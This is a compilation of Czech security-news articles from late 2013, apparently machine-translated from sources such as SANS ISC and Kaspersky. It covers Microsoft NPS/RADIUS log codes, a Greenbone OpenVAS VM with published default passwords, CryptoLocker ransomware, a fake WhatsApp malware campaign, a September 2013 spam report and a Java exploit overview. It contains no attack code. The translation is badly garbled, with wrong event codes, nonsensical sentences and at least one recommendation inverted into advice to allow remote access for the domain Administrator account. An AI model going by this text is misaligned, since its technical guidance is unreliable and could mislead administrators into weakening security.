[1] https://dns.robtex.com/fallencrafts.info.html # graf
[2]
https://dns.robtex.com/sosick.net.html # záznamy
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[ 6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125
CSAM: Microsoft Protokoly - NPS a IAS (RADIUS)
5.11.2013 Zabezpečení
Není pochyb o tom, když diskutuje Windows zaznamenává nejčastější otázky, které jsem si z mých klientů jsou téměř o ověření, a to zejména o ověřování Wireless nebo relací VPN pomocí protokolu RADIUS.
Společnost Microsoft podporuje RADIUS po celá léta jako IAS (Internet Authentication Service) a změnili název na serveru NPS (Network Policy a Access Services) v systému Windows Server 2008, spolu s přidáním lodní nových funkcí.
Kde můžete najít NPS protokoly? - Na několika místech ve skutečnosti má. Mnoho správců najdete NPS přihlásí nejjednodušší přístup v prohlížeči událostí systému Windows, kde je to rozdělené hezky.
Většina správců bude také ukládat textové protokol. Pokud jste něco jako já, pomocí grep, najít nebo findstr příkazy Jdi na způsob log přístupu.
On protokoly sami. Takové otázky jsem normálně si s OPL je "proč nemůže tento uživatel přístup k bezdrátové / VPN / cokoliv sítě?", Zvláště když ostatní uživatelé mohou. Téměř ve všech případech budou NPS služby logy říct přesně proč, ale důvod, proč není vždy prezentována tak snadno, jako by to mohlo být.
Například:
6273
Network Policy Server odepřen přístup k uživateli.
Kontaktujte Network Policy Server správce pro více informací.
Při pohledu na typickou protokolu, dostanete obecný "odepřen" mesage, ale budete mít také IP adresu NAS (Network Access Server), který je obvykle brána VPN, bezdrátového ovladače nebo aplikace - NAS Často klient RADIUS stejně. Budete často také MAC adresu AP příliš, nebo pokud používáte starší bezdrátové infrastruktury bez regulátoru, bude NAS je AP.
Pokud je bezdrátový přístupový žádost, budete mít také MAC adresa volající stanice (který by byl pracovní stanice).
Tak proč přesně jste si uživatel získat přístup odepřen? V případě, že prohlížeč zprávu, přejděte na samém dně a zkontrolujte Důvod pole Kód a text s ním spojené
Opravdu častým důvodem je kód 65, a to zejména během počáteční instalace nové SSID nebo politika: "Pokus o připojení se nezdařil, protože přístup k síti oprávnění pro uživatelský účet byl odepřen Chcete-li povolit přístup k síti, umožňuje přístup k síti oprávnění pro uživatelský účet. nebo, je-li uživatelský účet určuje, že přístup je řízen prostřednictvím odpovídající zásady sítě, umožňují přístup k síti oprávnění pro tuto síť politiky. "
Nejjednodušší způsob, jak opravit tohle je přidat jeden tick-box v poloměru konfiguraci - v síti politice, ve středu první strany, zaškrtněte políčko, které říká: "Ignorovat uživatelský účet vlastnosti vytáčení" Pokud jste don 't to bude mít každá žádost o přístup se podívat na účtu oprávnění zjistit, jestli mají "Povolit přístup" povolen na základě jejich Dial-in / Nastavení sítě Přístupová oprávnění.
Samozřejmě, že jiná častým důvodem kód na chyby 6273 bude 16:
Důvod Kód: 16
Důvod: Ověření nebylo úspěšné, protože Neznámé uživatelské jméno nebo chybné heslo bylo použito.
Budete často vidět tohle, pokud děláte ověřování pomocí pracovní stanice účtu domény Machine - pokud uživatel, který je stroj není v doméně, která vybere SSID, bude tento účet samozřejmě neexistuje.
A samozřejmě, když vidíte desítky a stovky z nich, můžete být svědky ověřování útok proti bezdrátového systému. Společné ochrany proti tomuto jsou nastavení uzamčení účtů, a nikdy dávat účty, které nemají uzamčení účtu do VPN nebo bezdrátový přístupový skupin. Doména účtu "Administrator" by Klasickým příkladem - je to má přístup ke všemu, v doméně a ve výchozím nastavení je nastavení uzamčení účtů zakázáno. "Administrator" je vždy cílového účtu v obou legitimní pentests a reálných útoků, takže jste nejlepší, povolit vzdálený přístup pomocí tohoto účtu. NPS Důvod Kód 36 označuje, že účet v zprávy protokolu byl uzamčen.
Zejména během instalace nové SSID, uvidíte účty selhat ověřování když jste si jisti, že pověření účtu jsou správné - v tomto případě zkontrolovat politiku, často politika NPS bude založen na AD skupin, ale buď uživatel nebo stroj musí být ve správné skupiny (například, "Corporate Wireless"). Je to velmi časté, aby si ujít tuto členství ve skupině požadavek na jeden nebo oba z těchto účtů, když se věci první je dát dohromady, nebo při přidávání nových uživatelů nebo strojů k doméně. Například na začátku září jsme viděli mnoho škol narazit na to, jak oni přidali studentské účty.
Všechny NPS důvod kódy jsou uvedeny zde: http://technet.microsoft.com/en-us/library/dd197570.aspx
Jaké další NPS ID zpráv budete běžně vidět v protokolech?
13
RADIUS byla přijata zpráva z neplatného IP klienta RADIUS abcd adresu
Zvláště při zakládání nového bezdrátového ovladače, VPN server nebo cokoliv jiného, budete vidět. V konfiguračním NPS, toto zařízení musí být přidán jako klient NPS.
Pokud používáte NPS k ověření přístup pro správu přepínačů, směrovačů a podobně, můžete vidět, pokud jste přidali nový přepínač (nebo cokoliv), ale minul klienta NPS konfigurační krok.
6272
Server zásad sítě udělen přístup k uživateli. Doufám, že jste vidět spoustu z nich - úspěšné autentizaci zprávy.
6273
Server zásad sítě umožněn neomezený přístup k uživateli, protože hostitel se setkal s definovanou zdravotní politiky. Ten je obecně vázáno na 6272 - po ověření úspěšné, musí být zdravotní politika v rámci NPS být splněny dříve, než je udělen přístup.
6274
Server zásad sítě zahozena požadavek na uživatele.
Tento text zprávy správně neodráží situaci. Zpráva 6274 je obecně znamená, že tento stav nastane, když NPS vyřadí účetní požadavky, protože RADIUS účtování žádost zprávu od klienta RADIUS neodpovídá NPS co očekává.
4400
připojení LDAP s řadičem domény pro DC0x.mydomain.com doména domény je usazen. Uvidíte tuto jednu plodinu až příležitostně - je to jen NPS "odbavení" je to s řadiči domény. Pokud je to tichý systém, můžete vidět bezprostředně následuje požadavek na ověření
4401
řadiče domény S-HOF-DC3.mscu.com pro doménu MSCU nereaguje. NPS se přepne do ostatních řadičů domény. Oops - vypadat, že je problém s jedním z řadičů domény. Budete často vidět tohle na Patch úterý, kdy servery restartovat po záplatování.
4402
není řadič domény pro doménu MNP
Ten je také často vidět na Patch úterý, a to buď když NPS serveru načte a služba by mohla přijít dříve, než v síti, nebo pokud jsou všechny DC to je v procesu restartování počítače.
Pokud to přichází v jiných situacích, můžete mít vážnější problém na serveru NPS nebo v síti.
Co chyby nebo důvod kódy jste viděli ve vašem systému? Použijte prosím náš formulář komentáře, dejte nám vědět, co jste viděli ve svých protokolech NPS, jak se zpráva vám pomohl problém vyřešit (nebo ne), a to, co vaše řešení bylo.
Greenbone a OpenVAS Scanner
5.11.2013
Zabezpečení
Úvod
Tento virtuální stroj k vám přijde péče o $ dayjob frustrace a potřebu vytvářet protokoly. Tento měsíc jsme se pokrývají logu a ve své laboratoři v práci bylo potřeba spouštět některé alarmy. Tak jsem vyrazil na vybudování OpenVAS [1] [5] apartmá s cílem vyvolat několik různých detekčních systémů. Security Greenbone správce [2] za předpokladu, vynikající, i když ne "jako" intuitivní, jak se mi líbí, rozhraní pro plánování skenování a v podstatě rozesílání sítě a aplikací ošklivosti. Prep to už dlouho, co jsem naposledy nastavit Suite OpenVAS tak "na Google Batman" ... Přitom rychlé vyhledávání Našel jsem několik blogu na různých distribučních instalace [3] [4] [5], jakož i OpenVAS Docs [6]. V tomto přípravka Také jsem hledal nejhladší distribuci pro instalaci, protože to bylo jen tak sedět jako virtuální stroj v mém $ dayjob laboratoři. Po prohledání fóra nejjednodušší se zdá být Ubuntu na 12.04 LTS, ale skončil jsem na CentOS 6.4. Tam jsou některé výhrady pro instalaci na CentOS, ale jen zdálo lepší výkon. CentOS Upozornění Pokud se chystáte instalovat na CentOS, pár připomínek: K dispozici bude pravděpodobně skončí tím, že některé chyby (viz [7]) pracovat přes. Pokud se vám podaří zprovoznit a nevidí provoz odchodu ještě Greenbone říká, že vaše práce běží? "Audit2Allow [8] je váš přítel!" Je pravděpodobné, že (téměř 99.9999%) SELinux. Pro ty, kteří chtějí, aby se líný cestu ven :) soubor, který hledáte, je v / etc / selinux a config: / etc / selinux / config
Ujistěte se, že spustit sestavení po procesu instalace, viz [5], a podívat se na poznámky na openvasmd - rebuild chladnýsmiley
Obecné nainstalovat Upozornění
Synchronizace z OpenVAS může trvat velmi ...... velmi dlouhá doba. Jen buďte trpěliví, pokud budete stavět sami, může počáteční synchronizace trvat hodně času (hodiny občas). Pokud nechcete, aby se čas na instalaci sami, můžete si stáhnout níže Greenbone VM. Spuštění úlohy
Greenbone VM
souboru: http://handlers.sans.org/rporter/greenbone.7z
Velikost souboru: 764 MB
Typ: OVF Template
OS: CentOS 6.4 (patch od 22.října 2013)
SHA1: a80c8a1da92c68d38202b23f382acbc46b3fb850
Virtual Machine vHardware Nastavení RAM 2gb HD 8 GB NIC můstku
Systémový účet: root
Systém Heslo: sanstraining Greenbone účet: admin Greenbone Heslo: sanstraining Všechna hesla bude sanstraining VM je nastaven pro DHCP Boot. Reference:
[1] http://www.openvas.org/
[2] http://www.greenbone.net/technology/openvas.html
[3] http://hackertarget.com/install-openvas-5-in- ubuntu-12-04 /
[4] http://samiux.blogspot.com/2013/05/howto-openvas-on-ubuntu-desktop-1204-lts.html
[5] http://www.securitygrit.com / 2013/05/openvas-6-and-centos-64.html
[6] http://www.openvas.org/install-packages-v5.html
[7] http://comments.gmane.org/gmane .comp.security.openvas.users/4889
[8] http://fedoraproject.org/wiki/SELinux/audit2allow
Cryptolocker Update, Žádost o informace
5.11.2013 Viry
To bylo stručně zmíněno v předchozí vysílání, ale Cryptolocker Ransomware je stále silné. V podstatě po infekci se šifruje všechny soubory "dokumentu" na základě přípony souboru a pak dává uživateli 72 hodin zaplatit výkupné ($ 300 USD nebo 2 BTC). Je to jeden z mála f kusů ransomware, který dělá šifrování doprava tak v současné době, krátký platit výkupné, není tam žádný jiný prostředek k dešifrování. pípání počítače je dobré napsat, ale nižší, než jsou TL, DR upozorní.
Jestliže jste nakaženi a soubory jsou zašifrovány (a nemáte žádné zálohy) je velmi omezené prostředky k obnovení souborů v aplikaci Microsoft kopií stínových Objem (Windows XP SP2 nebo vyšší). V podstatě lze říci, předchozí verze souborů přetrvávají v systému a může být využit ručně nebo pomocí nástroje, jako je stín Explorer .
Jiné, než to, že není v žádném případě v současné době k dispozici pro využití (kromě placení). Reinfecting jakmile vyprší časovač nebude resetovat timer a tam byly žádné zprávy o zotavení po znatelné množství času uplynulo 72 hodin. (Někteří omezené množství hodin hry mohou pomoci na okraji společnosti, ale protivníci říkají, že odstranit a očistit klíče a není tam žádný důkaz že to není pravda).
Tam jsou některé nastavení GPO můžete nasadit, aby se zabránilo tento druh infekce a pro nejvíce se rozdělit, některá z těchto nastavení jsou nejlepší postupy nezávisle Cryptolocker. V podstatě můžete zabránit provedení executibles v dočasných adresářích jehož podrobnosti jsou v pípání počítače .
Existují různé způsoby, které systémy se infikovala, na jednom místě to bylo UPS / FedEx styl spam, teď to vypadá, leze Zbot a dalších souvisejících nástrojů. V tomto bodě anti-virus má slušnou detekci takže udržet, že až do dnešního dne je významná pomoc.
Zdá se, že útočníci jsou také dávat pozor na různých fórech, ale není tam žádný přímý způsob, jak s nimi komunikovat.
ŽÁDOST: Pokud vy nebo vaše organizace zaplatil výkupné dešifrovat, rádi bychom s tebou mluvit (anonymně) o zkušenostech. Pište prosím přímo na bambenek / v / gmail.com
. QA (Katar) TLD Zhoršení
Hacking
Publikováno: 2013-10-19,
Aktualizováno: 2013-10-19 17:05:00 UTC
tím, Johannes Ullrich (Verze: 1)
0 komentář (ů)
Podle twitteru a zprávy, které jsme obdrželi přímo, zdá se, že. QA (Katar) TLD byla ohrožena včera večer syrské elektronické armády. Postižení domény zdá se vrací zpět k normálu v tomto bodě.
Google stále vrací některé výsledky za compromissed stránek, včetně jeho vlastní qa místo.:
Odkazy na Twitter zpráv o compromisse (sledování na vlastní nebezpečí): hxxp :/ / twitter.com/Pr0udSyrian/status/391525943035969536/photo/1
Vědci sinkhole několik Cryptolocker C & C
5.11.2013 Viry
Fotoaparát Cyber podvodníci stojí za Cryptolocker , jeden z nejnovějších Ransomware hrozbami, mají mnoho úspěchů v infikování PC uživatelům smrtící malware, ale zda oběti vysázet peníze, nebo ne, je stále neznámý. Podle společnosti Kaspersky Lab výzkumníků, malware je šifrovací schéma ještě musí být popraskané a ještě otázka je, zda to může být. "Pro každou oběť, připojí se jeho velení a řízení (C2) ke stažení RSA veřejný klíč, který se používá k šifrování dat. Pro každou novou oběť je další unikátní klíč vytvořen a pouze Cryptolocker autoři mají přístup k dešifrování klíče, " vysvětluje expert Costin Raiu. Oběti jsou si vědomi, že mají tři dny splatit, jinak je šifrovací klíč je zničena, a jejich soubory jsou ztraceny navždy pokud nebyly provedeny zálohu:
Ale otázka, že mnoho výzkumníků chcete zodpovědět, je, kolik uživatelů pádu na pasti a nakonec na krku Cryptolocker? Využitím malware domény algoritmus generace, které bylo zpětně analyzován podle Dimiter Andonov ThreatTrack Security, Kaspersky vědci podařilo závrtu třech oblastech které slouží jako C & C servery pro malware. Oni zjistili, že za pouhé čtyři dny, byli kontaktováni z 2764 unikátních adres IP obětí, většinou z USA, Velké Británii, Indii a Kanadě. však poukazují na to, je-li obětí rychle reagovat, mohou zabránit škodlivému softwaru šifrování souborů. "Pokud jsou vaše údaje jsou již šifrována, nejhorší věc, kterou musíte udělat, je zaplatit padouchy. To podnítí jim umožní rozšířit a posílit útok techniky," Raiu poukazuje na to, že tím, že to nejlepší, co člověk může udělat se chránit před touto hrozbou je, aby jejich AV a hostitele IPS aktualizovány a zálohovat pravidelně.
Fake WhatsApp oznámení doručí malware
5.11.2013 Viry
WhatsApp je jedním z nejoblíbenějších instant-messaging služby tam, a jeho obrovské uživatelské základně (více než 300 milionů aktivních uživatelů) umožňuje WhatsApp-themed spam skvělý způsob, jak infikovat velké množství počítačů. Poslední z těchto spamových kampaní je v současné době doručovat e-maily, prohlašovat, že má uživatel "Voice Message Notification / 1 Nová hlasová zpráva" Čekání ve svých schránkách, které jsou připojeny k e-mailu:
Bohužel, podle Webroot , falešný hlas mailu obsahuje Trojan downloader, který se pokouší stáhnout další malware z dobře známého C & C serveru. Jedinou dobrou zprávou v tom všem je, že tento konkrétní malware varianta má vysokou míru detekce a je více než pravděpodobné, že bude detekován většina AV řešení. Samozřejmě, že ne všichni uživatelé používají jeden, a jsou v nebezpečí, jak se dostat vědro jiný malware na svých strojích.
Spam v září 2013
4.11.2013 Zdroj: Kaspersky
Analýzy
Spam v centru pozornosti
Halloween spam
Spammeři a ukládání
Pojištění motorových vozidel služby
Geografické rozdělení zdrojů spamu
Škodlivé přílohy v e-mailu
Zvláštnosti škodlivého spamu
Phishing
Závěr
Spam v centru pozornosti
Po září chladné počasí jsme zaznamenali hodně hromadnou korespondenci o nabídkách snížit účty za vytápění a udržovat domy teple. Oni často se objevil jak v ruštině a angličtině spamu. Velký podíl hromadnou korespondenci září nabízí služby auto pojištění a inzeráty pro tiskové služby, zejména kalendáře pro rok 2014. Slavnostní spam v září byl hlavně v angličtině a byl věnován Halloween.
Halloween spam
Každý rok v předvečer Halloweenu jsme zaznamenali velké množství nevyžádané pošty související s touto populární dovolenou. Jako vždy, angličtině spam inzeruje karnevalové kostýmy, zatímco známé hromadné e-maily nabízející falešné značkové kabelky nalákat příjemcům Halloween dýně a sliby nadpřirozených slev. Malé a střední podniky s nadšením připojil k tažení dovolenou s strašidelné tématikou nevyžádaných e-mailů s reklamou na své zboží. Samozřejmě, že se název dovolenou používá v poli Předmět e-mailů, aby upoutaly pozornost.
V září jsme zaznamenali frankofonních hromadnou korespondenci věnovaný Halloween. Spammeři rozeslal zprávy reklamní karnevalové kostýmy a různé doplňky Halloween.
Spammeři a ukládání
Podzim přináší do prvních mrazů, topení a elektřiny náklady zvyšují. Tento sezónní fakt byl aktivně využíván spammery. Mnoho září zásilky nabízeny různé způsoby, jak udržet domy v teple a snížit účty.
Angličtina-jazyk hromadné e-maily v tomto směru většinou inzerovány instalaci specializovaných solárních panelů. Tyto zprávy dorazila v různých formátech: někteří obsahovala krátký kus textu, ostatní barevné banner.
Všechny zprávy obsahovaly dlouhý odkaz vedoucí k nově registrované domény, která se lišila od e-mailu na e-mail. Po sérii přesměrování tyto odkazy směřují uživatele na stránky popisující americké vlády dotační program pro instalaci solárních panelů, nebo prázdné stránky, která obsahuje vazby na společnosti, které by mohly instalovat solární panely nebo prodat související zařízení.
Září přinesl i několik hromadnou korespondenci o instalaci izolačních oken, slibuje ušetřit teplo a snížit náklady na energii. Tyto zprávy obsahovala dlouhé odkazy, které po sérii přesměrování, vedly uživatele na internetových stránkách obchod poskytuje více detailů a čeká na rozkazy.
Tam byl také hromadné e-maily od výrobců z LED diod, který také hrál na snižování nákladů tématem. Tyto e-maily obvykle přijel jménem ředitele společnosti a za předpokladu jeho kontaktní údaje. Výrobky společnosti byly podrobně popsány v textu zprávy, a tam byl odkaz na webové stránky společnosti. Tyto e-maily připomínal obchodní korespondence, ale byly adresovány generických příjemců, nikoli na konkrétní jednotlivce. Adresa odesílatele byla náhodná sada znaků, které, samozřejmě, se lišil od adresy kontaktní e-mail je uvedeno v e-mailu.
Pojištění motorových vozidel služby
Angličtina-jazyk spammeři používají auto pojištění nabízí nalákat uživatele na předávání osobních údajů. Záhlaví zpráv slíbil jednoduchý způsob, jak výrazně snížit náklady na pojištění motorových vozidel. Odkazy obsažené v e-mailech vedlo k nově vytvořené webové stránky, které oběti přesměrované na jinou prostředku, který neměl nic společného s pojišťovacími službami. Tato stránka pozvaní uživatelé odpovědět na tři otázky a vyhrajte MacBook Air, iPhone nebo iPad. Po zodpovězení otázek a výběru preferované cenu, uživatelé museli zadat své osobní údaje - jméno, adresa, PSČ, telefonní číslo a e-mailová adresa. Jinými slovy, pod záminkou hodnotné ceny, podvodníci pokusili získat kontaktní údaje z jejich obětí.
Geografické rozdělení zdrojů spamu
V září 2013 se podíl nevyžádané pošty v e-mailovém provozu se snížil o 1,4 procentního bodu a dosáhla průměrné hodnoty 66,2%. Top 3 Zdroje světového spamu nezměněny: Čína zůstala na 1. místě s 22% všech distribuovaných spamu, což představuje nárůst o 1 procentní bod oproti předchozímu měsíci, USA přišel druhý, když rozdělí 18% světového spamu, pokles o 1 procentní bod ve srovnání se srpnem; Jižní Korea byla třetí, v průměru 14% (1,4 procentních bodů). Celkem tyto tři země představovaly 54% světového spamu.
Zdroje spamu na celém světě podle zemí
Jako v srpnu, Tchaj-wanu obsadila čtvrté místo, což přispívá 6% na toku světového spamu, a to až o 0,8 procentního bodu.
Indie je podíl zvýšil o 2 procentní body, což představuje 5% a pohybuje se z osmá-pátá celkově.
Jak předpokládalo , Japonsko vloupal do top 10 nejvíce aktivních distributorů globálního spamu: její přínos ve výši 2,4%, zvedl ji do 9. ročníku místě. Kanada dokončil Top 10 s podílem 2%, která tlačila ho dvě místa.
Bělorusko a Německo viděl jejich akcie pokles: Bělorusko (0,8%) se snížil na šesti místech a Německo (0,7%) rovněž vypadl z Top 10.
Ostatní Top 10 členů udržuje své pozice v ratingu se zanedbatelnými výkyvy v jejich příspěvků.
Zdroje spamu v Evropě podle země
V září, Jižní Korea zůstala hlavním zdrojem spamu poslal do evropských uživatelů (54%), i když jeho podíl klesl o 6 procentních bodů. To bylo následováno Tchaj-wan (5,6%) a Indie (4,8%). Indie je podíl zvýšil o 2,7 procentního bodu, pohybující se až od šestého do třetího místa.
Minulý měsíc třetí místo obsadil v USA (3,6%). V září klesla na šesté místo i když jeho podíl klesl jen nepatrně - pouze 0,3 procentních bodů.
Rusko (4,3%) a Vietnamu (4,1%) zůstal v 4. a 5. místa, resp. Nicméně, celkové procento spamu pocházejícího z těchto dvou zemí se zvýšil o 1,5 procentního bodu.
V září, TOP 10 součástí Malajsie (1,2%). Dva další asijské země, Japonsko a Hong Kong, také produkoval větší podíl spamu ve srovnání s předchozím měsícem - jejich počet se zvýšil o 0,6 a 0,9 procentního bodu, resp účet pro 1,2% a 1% spamu zaslány evropským uživatelům.
Mezitím září Spamové toky z Německa (0,7%) se snížil o 0,8 procentního bodu, což mělo za následek, že klesá na 17. místo v hodnocení.
Zdroje spamu podle krajů
V září Asie (59%) zůstal vedoucím regionální spamu zdroj zvýšila svůj podíl o 4 procentní body z předchozího měsíce. Severní Amerika (20%) a východní Evropa (12%) také udržoval své druhé a třetí míst, i když jejich postavy změnilo ve srovnání se srpnem: Severní Amerika podíl zvýšil o 2 procentní body, zatímco východní Evropě se podíl snížil o 2 procentní body. Západní Evropa (4%) a Latinská Amerika (2,4%) byla čtvrtá a pátá, resp.
Škodlivé přílohy v e-mailu
V září Top 10 škodlivých programů se šíří e-mailem viděl hlavní změny a zahrnoval pět nováčků.
Top 10 škodlivých programů se šíří e-mailem ve 3. čtvrtletí 2013
Trojan-Spy.html.Fraud.gen zůstala nejrozšířenější škodlivý program, pozice to držel několik měsíců v řadě. Pro připomenutí, Fraud.gen patří do rodiny trojských koní, které využívají technologii spoofing: tyto trojské koně napodobit HTML stránek a jsou distribuovány prostřednictvím e-mailu uvedeného v podobě oznámení od velkých komerčních bank, e-obchody, softwarové firmy, atd.
Čtyři z pěti nováčků v hodnocení zářijový - 2., 3., 6. a 9. - byly škodlivé programy z rodiny Bublík. Jejich hlavní funkcí je neoprávněné stahování a instalace nových verzí malware na počítačích obětí. Jakmile je úloha splněna, program nezůstává aktivní: je kopíruje do souboru% temp% imituje aplikaci Adobe nebo dokument.
E-Worm.Win32.Bagle.gt byl ve 4 tém místě. Tento mailový červ je spustitelný soubor distribuován v podobě e-mailových příloh. Jako většina mailových červů je self-rozrůstá na adresy v oběti adresáře. To může také stáhnout další škodlivé programy do počítače bez vědomí uživatele. Pro šíření škodlivých zpráv E-mailové Worm.Win32.Bagle.gt používá svůj vlastní SMTP knihovnu.
Dalším nováčkem září Trojan-PSW.Win32.Fareit.xvf, přišel pátý v kvalifikaci. Tento škodlivý program je navržen tak, aby krást jména a hesla z napadených počítačů. Stáhne vlastních aktualizací, aniž by byl zakořeněný v systému a imituje aplikaci Adobe nebo dokument.
Trojan.Win32.Llac.dleq byl na 7. místě. Tento program je hlavním úkolem je špehovat uživatele: shromažďuje informace o používání softwaru (většinou o antivirové programy a firewally) nainstalován na počítači, na počítači sám (procesor, operační systém, disky), to zachytí webová kamera obrázky a klávesových zkratek (keylogger) a sklizní důvěrná data z různých aplikací.
E-Worm.Win32.Mydoom.l byl osmý v září. Tato síť červ s backdoor funkce se šíří jako přílohu e-mailu pomocí služby sdílení souborů a zapisovatelné síťovým zdrojům. To sklizně e-mailové adresy z infikovaných počítačů, takže mohou být použity pro další hromadnou korespondenci. Červ také se připojuje přímo k příjemce SMTP serveru.
Ještě jeden červ, E-Worm.Win32.Mydoom.m, dokončil září v Top 10 nejrozšířenější škodlivé programy. Skenuje MS Windows adresáře a aplikace Internet Explorer mezipaměť prohlížeče k vyhledání adres pro nové oběti. Kromě vlastní zbraní odešle skryté požadavků na vyhledávání vyhledávačů a tím zvýšit návštěvnost a kvalifikací stránek, stažených ze serverů zločinců.
Distribuce e-mailových antivirových odhalení podle země
Top 3 země zaměřují nejvíce nebezpečných e-mailů se nezměnily: Německo (12,67%) byla na prvním místě opět následují společnosti z USA (11,33%) a ve Spojeném království, který viděl jeho podíl na svah 9,98% tento měsíc.
Rusko zůstalo v poloze 9. když procento zjištěných antivirových v zemi klesl na 2,6%.
Také stojí za zmínku, je skutečnost, že Saúdská Arábie (2,41%) až do Top 10 v září.
Zvláštnosti škodlivého spamu
Podvodníci nemají často zaměřují internetových a telekomunikačních poskytovatelů. Nicméně, v září 2013 jsme zaznamenali několik škodlivých hromadnou korespondenci, které zneužívají jména mezinárodních firem podnikajících v této oblasti.
Britská telekomunikační společnost BT Group byla vyvolána k distribuci Trojan-Downloader.Win32.Dofoil, který stáhne a spustí škodlivý software na počítači. Falešná zpráva uvádí, že příjemce nedávno uvedeno novou e-mailovou adresu, která by v budoucnu být využívána k doručování oznámení a aktualizace. Pro podrobnější informace, že příjemce vyzván, aby otevřel přílohu, která ve skutečnosti byla skrytá Trojan. Ve snaze přesvědčit příjemce legitimity e-mailu, útočníci použili adresu odesílatele, která se zdála na první pohled legitimní a odkaz na oficiální webové stránky společnosti. Je však třeba Neprovedení osobního a adresu přiloženém spustitelný soubor BT.Email Address Details.pdf.exe varovat uživatele na nebezpečí podvodu.
Falešné oznámení z banky, nejsou neobvyklé. V září jsme zaznamenali nebezpečný hromadnou korespondenci údajně poslal jménem Webster banky. Tentokrát přečtení zprávy, že společnost byla kontrola všech transakcí klienta identifikovat podezřelé aktivity v oblasti platebního styku. Napsat součástí přiloženého Trojan downloader Trojan-Downloader.Win32.Angent se tváří jako zprávy z banky. Chcete-li, aby jejich e-maily vypadají legitimní, podvodníci poslal z falešné adresy podobnou té oficiální a tělo e-mailu obsahoval odkaz na oficiálních stránkách společnosti, stejně jako automatický podpis.
Phishing
Nejatraktivnější cíle pro útoky typu phishing se výrazně neliší v září. Sociální síť lokalit pokračoval na začátek seznamu (28,1%).
Distribuce Top 100 organizacemi, na něž phisherů, podle kategorie *
Toto hodnocení je založeno na anti-phishing společnosti Kaspersky Lab dílčích odhalení, které jsou aktivovány pokaždé, když se uživatel pokusí klikněte na odkaz phishing, bez ohledu na to, zda je odkaz v nevyžádaných e-mailů nebo na webové stránce.
Podíl e-mail a instant messaging služby (18,1%) se zvýšila o 0,8 procentního bodů, což znamená v této kategorii zůstal druhý. Vyhledávače (16%) byla 3 rd s mírným poklesem 0,1 procentního bodu.
Podíl finančních a E-placené služby (14,9%) se zvýšil o 1 procentní bod a uviděl této kategorii vyrovnal minulý měsíc čtvrté místo.
IT dodavatelé ztratili 0,5 procentních bodů a vyměnili místa spolu s poskytovateli telefonních a internetových služeb, jejichž podíl vzrostl (0,6 procentních bodů): tyto dvě kategorie obsadili 5. a 6. místa příslušně.
V září se pozornost z phisherů opět zaměřil na velkých bank v Austrálii a na Novém Zélandu. V červenci 2013 jsme zaznamenali hromadnou korespondenci obsahující falešné upozornění zaslané na účet banky Austrálie a Nový Zéland Banking Group. Tentokrát phishingu snažil oklamat klienty Westpack, jedné z předních bank v Austrálii.
Útočníci se ani nesnažila vymyslet něco nového podvádět oběti - prostě použili léty prověřenou trik. Falešný e-mail příjemce informován, že bezpečnostní systém on-line bankovní služby evidovala tři neoprávněné pokusy vstoupit na účet a podle bezpečnostních pravidel, zablokoval přístup. Pro odblokování účtu, musel uživatel otevřít přiložený soubor. Archiv Westpac_form-413-217-9908.zip obsahuje HTML stránky, které vyžadují osobní informace o uživateli. Jakmile jsou všechny pole byla vyplněna, data byla převedena na podvodníky.
Phishing stránka používá barvy a logo na oficiálních stránkách banky, ale nebylo to přesná kopie. Nicméně, pokud uživatel klikl na odkaz na podvodnou stránku k zadání jednoho z lokality stránek, oficiální stránky banky otevřen v samostatném okně. Chcete-li oklamat uživatele, phishingu také podrobné informace o účtu, jako IP adresy, které byly údajně použity pro neoprávněnými pokusy o zadání hesla.
Závěr
V září se podíl světového spamu v mailového provozu i nadále klesat a dosáhne 66%. Jako vždy spammeři zaměřena na reklamní zboží, sezónní a služeb. Například počet nabídek souvisejících s energetickou úsporu a izolace staveb výrazně zvýšil. Září hromadnou korespondenci využívány na téma populárních svátků - tentokrát se chystali Halloween a Nový rok. Příští měsíc podíl vánoční spam bude zřejmě poroste.
Jak se dalo očekávat, podíl útoků na sociálních sítích snížil, zatímco podíl útoků na finanční a e-pay služby vzrostly. Tyto změny však byly zanedbatelné a hodnocení organizací nejčastěji namířena phisherů neviděl velké změny. S největší pravděpodobností obou těchto trendů bude pokračovat v říjnu. Rovněž v září podvodníci spíše přesouvá své útoky kroků od bank a poskytování služeb a na různých telekomunikačních společností.
Kaspersky Lab Zpráva: Java pod útokem - vývoj využije v letech 2012-2013
4.11.2013 Zdroj: Kaspersky
Analýzy
Úvod: Proč jsme se rozhodli prozkoumat Java
Rychlé Q & A o Javě
Metodika zprávy: Co a jak se počítá
Hlavní zjištění
Část 1: rok zranitelnosti v Javě
Část 2: Rok útoků na uživatele Java
Část 3: Mezinárodní hrozba - geografie útoků uživatelů a zdrojů
Část 4: Bližší pohled na činů "v přírodě"
Část 5: Plus 4,2 milionu útoků zachycených Automatické technologií Exploit Prevention
Závěr: Význam sofistikovaných technologií v době sofistikovaných útoků
Úvod: Proč jsme se rozhodli prozkoumat Java
Jedním z největších problémů, kterým čelí IT bezpečnostní průmysl je využití chyby ve legitimní software pro spuštění malware útoků. Škodlivé programy mohou používat tyto chyby infikovat počítač, aniž by přilákaly pozornost uživatele - a, v některých případech bez spuštění upozornění od bezpečnostního softwaru.
To je důvod, proč počítačoví zločinci preferují tyto útoky, známé jako zneužití, oproti jiným metodám infekce. Na rozdíl od sociálního inženýrství, které mohou být hop nebo trop, využití zranitelnosti pokračuje produkovat požadované výsledky.
Využije jsou speciální programy, které využívají zranitelnosti populární software využívají miliony lidí po celém světě. Pracují nenápadně, a uživatelé mohou obětí jednoduše tím, že navštívíte stránku, která obsahuje škodlivý kód exploitu nebo otevřením zdánlivě legitimní soubor s skryté škodlivého kódu. Využije jsou navrženy tak, aby stávku určité verze softwaru, které obsahují chyby, takže pokud má uživatel tuto verzi softwaru na otevření škodlivého objektu, nebo pokud web používá tento software ovládat, spustí exploit. Jakmile se získá přístup pomocí zranitelnosti, exploit načte další malware ze serveru zločinců ", které v závislosti na zamýšleném cíli, provádí škodlivou činnost jako jsou krádeže osobních údajů pomocí počítače jako součást botnetu na rozesílání nevyžádané nebo provádět DDoS útoky apod.
